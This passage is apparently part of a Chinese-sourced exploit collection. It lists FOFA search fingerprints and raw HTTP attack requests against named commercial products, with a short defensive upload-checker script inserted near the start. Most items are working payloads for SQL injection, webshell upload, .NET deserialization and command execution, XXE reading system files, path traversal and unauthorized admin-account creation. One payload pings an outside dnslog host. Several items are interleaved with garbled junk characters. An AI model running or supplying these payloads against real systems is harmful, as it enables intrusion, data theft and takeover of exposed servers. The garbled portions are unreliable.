-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Uploaded file is then reachable at (note the trailing space after .php in the filename above):
http://x.x.x.x/tmpfile/updB3CB.tmp.php
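
The upload POCs above (items 24, 28, 35, 42, 48 and 49) lean on the same few tricks: a script extension on the uploaded name, a path smuggled into the filename or into a second text field, a trailing space after the extension, and a JSP/PHP body behind an innocuous Content-Type. As an added example for this write-up (not code from the original post or from any vendor named in it), the Python below parses a raw multipart body with a small hand-written splitter and flags each of those conditions. The two request bodies it scans are constructed after items 24 and 49; the boundary string, field names and file contents are assumptions.

```python
"""Multipart upload checks mirroring the upload POCs above (items 24, 28, 35,
42, 48, 49).

Added example for this write-up, not code from the original post or from any
vendor named in it. The request bodies below are constructed after items 24
and 49; the boundary string, field names and contents are assumptions.
"""
import re

SCRIPT_EXTS = {"jsp", "jspx", "jspf", "php", "phtml", "phar", "asp", "aspx", "ashx"}
SCRIPT_MARKERS = (b"<%", b"<?php", b"<?=", b"<script runat")


def parse_boundary(content_type):
    """Boundary parameter from a Content-Type header value."""
    m = re.search(r'boundary="?([^";]+)"?', content_type, re.I)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    return m.group(1).strip()


def _param(disposition, key):
    """Value of name=/filename= in a Content-Disposition value, or None.
    The negative lookbehind keeps name= from matching inside filename=."""
    m = re.search(r'(?<![a-z])%s="([^"]*)"' % key, disposition, re.I)
    return m.group(1) if m else None


def parse_multipart(body, boundary):
    """Split a raw multipart/form-data body into parts, each a dict with
    name, filename (None for plain text fields), headers and data bytes."""
    delim = b"--" + boundary.encode("latin-1")
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        chunk = chunk.lstrip(b"\r\n")
        head, sep, data = chunk.partition(b"\r\n\r\n")
        if not sep:
            head, sep, data = chunk.partition(b"\n\n")
        headers = {}
        for line in head.decode("latin-1").splitlines():
            key, colon, value = line.partition(":")
            if colon:
                headers[key.strip().lower()] = value.strip()
        # drop the single line break that precedes the next delimiter
        if data.endswith(b"\r\n"):
            data = data[:-2]
        elif data.endswith(b"\n"):
            data = data[:-1]
        disp = headers.get("content-disposition", "")
        parts.append({"name": _param(disp, "name"), "filename": _param(disp, "filename"),
                      "headers": headers, "data": data})
    return parts


def _ext(name):
    """Extension after the last dot, ignoring trailing whitespace ("x.php ")."""
    tail = name.rstrip()
    return tail.rsplit(".", 1)[-1].lower() if "." in tail else ""


def check_upload(content_type, body):
    """Findings for one multipart request, as 'field: reason' strings."""
    findings = []
    for part in parse_multipart(body, parse_boundary(content_type)):
        field = part["name"] or "?"
        fn = part["filename"]
        if fn is not None:
            if _ext(fn) in SCRIPT_EXTS:
                findings.append(f"{field}: script extension .{_ext(fn)}")
            if fn != fn.strip():
                findings.append(f"{field}: filename has leading/trailing whitespace")
            if "/" in fn or "\\" in fn:
                findings.append(f"{field}: filename carries a path ({fn!r})")
        elif _ext(part["data"].decode("latin-1")) in SCRIPT_EXTS:
            findings.append(f"{field}: text field is a path ending in a script extension")
        if part["data"].lstrip().startswith(SCRIPT_MARKERS):
            findings.append(f"{field}: body starts with a server-side script marker")
    return findings


# --- constructed sample requests (assumed boundary and field names) ---------
BOUNDARY = "----WebKitFormBoundaryProbe"
SAMPLE_CT = "multipart/form-data; boundary=" + BOUNDARY


def _body(*parts):
    """Assemble a multipart body from (raw part headers, data) pairs."""
    d = ("--" + BOUNDARY).encode()
    out = b""
    for headers, data in parts:
        out += d + b"\r\n" + headers + b"\r\n\r\n" + data + b"\r\n"
    return out + d + b"--\r\n"


# after item 24: .txt upload carrying JSP, target path in a second field
SAMPLE_ITEM24 = _body(
    (b'Content-Disposition: form-data; name="upload"; filename="note.txt"\r\nContent-Type: text/plain',
     b'<% out.println("probe"); %>'),
    (b'Content-Disposition: form-data; name="fname"', b"\\webapps\\nc_web\\probe.jsp"),
)
# after item 49: .php filename with a trailing space
SAMPLE_ITEM49 = _body(
    (b'Content-Disposition: form-data; name="file"; filename="shell.php "\r\nContent-Type: application/octet-stream',
     b"wersqqmlumloqa"),
    (b'Content-Disposition: form-data; name="upload"', b"upload"),
)
SAMPLE_BENIGN = _body(
    (b'Content-Disposition: form-data; name="file"; filename="report.pdf"\r\nContent-Type: application/pdf',
     b"%PDF-1.4 constructed placeholder"),
)

if __name__ == "__main__":
    for label, body in (("item24", SAMPLE_ITEM24), ("item49", SAMPLE_ITEM49), ("benign", SAMPLE_BENIGN)):
        print(label, check_upload(SAMPLE_CT, body))
```

The splitter deliberately keeps the raw filename (including the trailing space of item 49) instead of normalizing it first; the whitespace and path checks only make sense on the value the target application actually received.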

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) Social Commerce ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

9 b, S; D4 l; y0 ]52. 泛微E-Office json_common.php sql注入
1 r9 |1 F. e+ v  e$ }; OFOFA:app="泛微-EOffice"
6 v/ C( Q  T. L& X' c3 ]" fPOST /building/json_common.php HTTP/1.12 y1 x( q# j6 u5 O0 g9 A# M
Host: 192.168.86.128:8097
0 x9 R* m# n, _9 eUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
0 p0 f- I, }& d6 b  S" IConnection: close. z# `- k  g- b/ ~! `* |
Content-Length: 87
5 S  M, q0 v+ u* x2 l( v+ H! _Accept: */*+ I# R2 M$ {8 j$ b5 Y
Accept-Language: en
5 D- V3 x0 {9 E7 j+ o, }Content-Type: application/x-www-form-urlencoded
3 k# R, Y! E6 N: `5 n0 ZAccept-Encoding: gzip5 ?+ _3 ^* m8 i+ u
2 S. R4 D0 u; |3 ?( ]" u
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
) _4 {  q2 ~4 |8 ~# p0 ~5 f
& l) }- w* |" w' C' N( D4 @$ |' _# a
53. DPTech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
Note: the POC recorded for this entry is a path-traversal read of /etc/passwd, not an upload request:
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes a marker string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL to confirm the file was written:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: with that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA:app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

4 G2 s5 J. [/ c5 P2 j57. 畅捷通T+ keyEdit.aspx SQL注入
0 s$ G3 F9 |* R; h) T6 MFOFA:app="畅捷通-TPlus"
0 X" }/ l  w" F- X* hGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
  p0 u; D7 J8 R6 ^Host: host
' Y+ C  o6 s1 [' k( V0 CUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36+ W* S+ y3 v" P3 z$ p
Accept-Charset: utf-8
6 B. X  ^" o" U  JAccept-Encoding: gzip, deflate) m6 d. A" d  D7 |. x
Connection: close
, y2 m( n9 Z, w' ~& L
  u8 E5 ^" x  o; d7 v3 C% [
  W3 u( J# n/ X8 ~0 r58. 畅捷通T+ KeyInfoList.aspx sql注入
4 U1 k& z6 @8 L8 wFOFA:app="畅捷通-TPlus"! n/ S5 D( K, E( T4 |6 B5 N6 i
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1/ N) F/ V$ a, |" X
Host: your-ip
+ I) p( Y& J" {/ v$ d( A' zUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36; F0 I  J( @* C+ W
Accept-Charset: utf-82 t8 y' ~7 }$ S" {1 x; F2 [0 J9 n
Accept-Encoding: gzip, deflate
$ c- j8 T8 @+ w' TConnection: close& y/ j9 J- K. @4 `* M

4 U6 ?8 z; V! E8 J" p/ \0 S$ q3 J+ H
59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 Customer Resource Management System fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the directory it is written to, and fileType gives its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-Server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) 掌上校园 campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

Then request:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then request:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then request:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
